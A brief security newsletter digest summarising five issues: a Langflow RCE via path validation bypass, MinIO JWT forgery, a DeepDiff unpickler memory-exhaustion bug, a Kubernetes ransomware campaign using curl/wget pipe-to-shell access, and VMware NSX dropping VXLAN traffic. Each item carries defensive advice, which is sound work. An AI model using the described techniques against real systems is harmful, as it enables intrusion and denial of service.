Another week of open-source tools handing out admin rights and hypervisors deciding your network traffic is optional.
๐ Langflow RCE
Authenticated attackers can bypass lazy path validation in the Langflow v2 API to write arbitrary files anywhere on the host. It's a trivial path to host RCE. Patch or choke off v2 API access before someone pivots into your network.
๐ชช MinIO Admin Hijack
MinIO shipped a critical JWT algorithm confusion bug in its OIDC setup. Anyone with a leaked `ClientSecret` can forge tokens and grant themselves `consoleAdmin`. Patch MinIO and rotate OIDC secrets before your storage gets owned.
๐ฅ 42 Bytes to OOM
A botched patch in DeepDiff's restricted unpickler bypasses its class filter. A crafted 42-byte payload forces a 10GB memory allocation, triggering an instant OOM kill. This leaves platforms like AWS SageMaker wide open to a hilariously cheap DoS. Pin DeepDiff to 8.6.2 immediately.
โ ๏ธ K8s Ransomware
TeamPCP is hunting Kubernetes clusters with container-specific ransomware. They rely on basic pipe-to-shell (curl/wget) for initial access, then abuse native K8s features to move laterally and detonate. Alert on interactive shell pipes and audit clusters before production gets encrypted.
๐ป VMware NSX Blackhole
If pod routing randomly breaks across subnets, blame the infrastructure. VMware NSX deep packet inspection is silently dropping valid VXLAN traffic on UDP port 8472. This self-inflicted DoS will burn days of troubleshooting. Swap your K8s CNI backend to WireGuard, or move VXLAN traffic off the standard port to bypass NSX entirely.